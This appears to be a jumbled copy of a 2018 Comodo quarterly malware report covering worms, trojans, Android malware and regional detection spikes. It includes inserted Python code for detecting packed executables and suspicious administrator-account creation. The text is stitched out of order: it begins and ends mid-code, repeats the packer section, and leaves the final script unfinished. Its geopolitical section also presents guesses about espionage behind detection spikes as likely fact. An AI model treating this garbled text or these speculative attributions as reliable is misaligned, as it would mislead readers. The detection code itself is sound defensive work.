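    """Bits per byte: 8.0 is uniformly random; compressed or encrypted
    payloads typically score above ~7, plain code and text well below."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes):
    """Yield (name, virtual_size, raw_bytes) for each section of a PE image."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", image, 0x3C)[0]          # e_lfanew
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    n_sections = struct.unpack_from("<H", image, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", image, pe_off + 20)[0]  # SizeOfOptionalHeader
    table = pe_off + 24 + opt_size                             # section table start
    for i in range(n_sections):
        off = table + 40 * i                                   # IMAGE_SECTION_HEADER is 40 bytes
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", image, off + 8)
        yield name, vsize, image[raw_ptr:raw_ptr + raw_size]


def packing_indicators(image: bytes, entropy_threshold: float = 7.0):
    """Return human-readable reasons the file looks packed (empty list if none)."""
    reasons = []
    for name, vsize, raw in pe_sections(image):
        if name in PACKER_SECTION_NAMES:
            reasons.append(f"section {name!r} is a known packer section name")
        if not raw and vsize >= 0x1000:
            reasons.append(f"section {name!r} has no raw data but {vsize:#x} bytes virtual size")
        if raw:
            ent = shannon_entropy(raw)
            if ent > entropy_threshold:
                reasons.append(f"section {name!r} entropy {ent:.2f} exceeds {entropy_threshold}")
    return reasons


def build_test_pe(sections):
    """Build a minimal PE image from [(name, virtual_size, raw_bytes)].
    Constructed for the example: headers are zeroed except the fields parsed above."""
    align = lambda x: (x + 0x1FF) & ~0x1FF                     # 512-byte file alignment
    n, opt_size = len(sections), 224                           # PE32 optional header size
    image = bytearray(0x40)
    image[:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, 0x40)                  # e_lfanew -> 0x40
    image += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x102)
    image += b"\0" * opt_size
    raw_ptr = align(0x40 + 4 + 20 + opt_size + 40 * n)
    for name, vsize, raw in sections:
        size = len(raw)
        image += name.encode().ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", vsize, 0, size, raw_ptr if size else 0, 0, 0, 0, 0, 0)
        raw_ptr += align(size)
    image += b"\0" * (align(len(image)) - len(image))
    for _name, _vsize, raw in sections:
        image += raw + b"\0" * (align(len(raw)) - len(raw))
    return bytes(image)


# Constructed section contents: seeded pseudo-random bytes stand in for a
# compressed payload, repeated text stands in for ordinary code/data.
_rng = random.Random(2018)
_COMPRESSED = bytes(_rng.getrandbits(8) for _ in range(4096))
_PLAIN = b"The quick brown fox jumps over the lazy dog. " * 100
PACKED_SECTIONS = [("UPX0", 0x20000, b""), ("UPX1", 0x8000, _COMPRESSED), (".rsrc", 0x400, _PLAIN)]
CLEAN_SECTIONS = [(".text", 0x1200, _PLAIN), (".data", 0x400, _PLAIN[:1024])]

if __name__ == "__main__":
    for label, secs in (("packed", PACKED_SECTIONS), ("clean", CLEAN_SECTIONS)):
        print(label, packing_indicators(build_test_pe(secs)) or "no indicators")
```

Entropy alone is a noisy signal (certificates, embedded images and legitimately compressed resources also score high), so a rule like this is best used to prioritise samples for sandboxing or unpacking rather than as a verdict on its own.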
In Q2 2018, Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm email servers with messages in order to "kill" or shut them down, a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images and videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section, let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected in not only one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infections of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset call forwarding
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot:
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.
Here are some commands from its Command and Control server:
contacts - get contact details and email id
Mute - set action to mute
Mms - get MMS content
info - get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, operates mostly in Iran. It uses third-party play stores, social networks and messengers for spreading.
Version 1
CloudVPN MyIrancel Mtproto زیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it is sold in three options: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1
Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip" option. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises named above.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which improves its mining capability. It is disseminated via the counterfeit apps you see below, but one of its vectors is especially interesting.
Version 1: Netflix Hack, Instagram Hack
Version 2: TSF Launcher
Version 3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via... another cryptominer, named CoinMiner.
How is that possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it on the victims' machines. However, she is not aware that another cybercriminal earlier infected CoinMiner with CoinHive. So the first attacker is a victim: thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
(Chart: Android-targeted malware in April 2018)
4.2.2 May 2018
(Chart: Android-targeted malware in May 2018)
4.2.3 June 2018
(Chart: Android-targeted malware in June 2018)
5 Malware in Q2 2018: The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial of service. For this Q2 2018 report we place worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.
In Q2 2018, Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter, the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects "exe" and "scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, whose use to spread banking malware via social networks led to the arrest of 10 people by the FBI in 2012.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files, and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
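The behaviour attributed to Starter above, a new local account that is promptly added to the Administrators group, leaves a pair of Windows Security events that can be correlated. The following is an added Python example, not Comodo's or Microsoft's code: it correlates event 4720 (user account created) with event 4732 (member added to a security-enabled local group) for the built-in Administrators group (SID S-1-5-32-544). The log lines are constructed for this example in a simplified "timestamp key=value" form, and the one-hour window and account names are assumptions.

```python
"""Flag accounts that are created and then promoted to Administrators shortly after.

Windows Security event 4720 records the new account's SID in TargetSid; event 4732
records the group in TargetSid and the added account in MemberSid. The sample log
below is constructed for this example (simplified "timestamp key=value" lines, not
real Windows output).
"""
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of the built-in Administrators group

# Constructed sample: a service-like account created by SYSTEM and promoted two seconds
# later, plus benign activity (a user added to Users, an existing account promoted,
# and a promotion long after creation) that should not be flagged.
SAMPLE_LOG = """\
2018-06-02T03:14:07 EventID=4720 SubjectUserName=SYSTEM TargetUserName=svc_remote TargetSid=S-1-5-21-111-222-333-1105
2018-06-02T03:14:09 EventID=4732 SubjectUserName=SYSTEM TargetUserName=Administrators TargetSid=S-1-5-32-544 MemberSid=S-1-5-21-111-222-333-1105
2018-06-02T09:30:00 EventID=4720 SubjectUserName=alice TargetUserName=bob TargetSid=S-1-5-21-111-222-333-1106
2018-06-03T10:00:00 EventID=4732 SubjectUserName=alice TargetUserName=Users TargetSid=S-1-5-32-545 MemberSid=S-1-5-21-111-222-333-1106
2018-06-04T11:00:00 EventID=4732 SubjectUserName=alice TargetUserName=Administrators TargetSid=S-1-5-32-544 MemberSid=S-1-5-21-111-222-333-500
2018-06-05T08:00:00 EventID=4720 SubjectUserName=alice TargetUserName=carol TargetSid=S-1-5-21-111-222-333-1107
2018-06-07T08:00:00 EventID=4732 SubjectUserName=alice TargetUserName=Administrators TargetSid=S-1-5-32-544 MemberSid=S-1-5-21-111-222-333-1107
"""


def parse_line(line):
    """Turn one 'timestamp key=value ...' line into a dict with typed ts and EventID."""
    ts, *pairs = line.split()
    event = dict(pair.split("=", 1) for pair in pairs)
    event["ts"] = datetime.fromisoformat(ts)
    event["EventID"] = int(event["EventID"])
    return event


def parse_log(text):
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def find_new_admins(events, window=timedelta(hours=1)):
    """Return one alert per account added to Administrators within `window` of its creation.

    Only accounts whose 4720 precedes the 4732 are considered, so promotions of
    pre-existing accounts and additions to other groups are ignored.
    """
    created = {}  # new account SID -> its 4720 event
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = ev
        elif ev["EventID"] == 4732 and ev["TargetSid"] == ADMINISTRATORS_SID:
            origin = created.get(ev["MemberSid"])
            if origin is not None and ev["ts"] - origin["ts"] <= window:
                alerts.append({
                    "account": origin["TargetUserName"],
                    "created_by": origin["SubjectUserName"],
                    "promoted_by": ev["SubjectUserName"],
                    "seconds_to_admin": (ev["ts"] - origin["ts"]).total_seconds(),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_new_admins(parse_log(SAMPLE_LOG)):
        print("new account promoted to Administrators:", alert)
```

On a real host the same fields are available from the Security log's EventData, so the correlation can be applied unchanged to exported events.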
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and it leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018, Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
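Packing of the kind described in this section leaves traces in a PE file's section table: compressed or encrypted section bodies have near-random byte distributions, the decompression stub needs a writable and executable section, and UPX-style packers leave an empty section (the unpack destination) with a large virtual size and a telltale name. The following is an added Python example, not Comodo's, UPX's or Microsoft's code, that parses the PE section table and reports these indicators. Both PE images are constructed inline and are not real binaries; the packer section-name list, the 7.0-bit entropy threshold and the sample layout are assumptions for this example, while the IMAGE_SCN flag values and header offsets are the standard PE ones.

```python
"""Heuristic packer check over a PE section table.

Indicators reported: known packer section names, a section with no raw data but a
large virtual size (unpack destination), writable+executable sections, and section
bodies with high Shannon entropy (compressed or encrypted data). The two sample
images are constructed inline for this example and are not real executables.
"""
import math
import random
import struct

# Section names left by common packers (assumed list for this example).
KNOWN_PACKER_SECTIONS = {b"UPX0", b"UPX1", b"UPX2", b".aspack", b".adata",
                         b"MPRESS1", b"MPRESS2", b".petite"}
IMAGE_SCN_MEM_EXECUTE = 0x20000000  # standard PE section characteristic flags
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HEADER = "<8sIIIIIIHHI"      # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 for empty input and up to 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(image: bytes):
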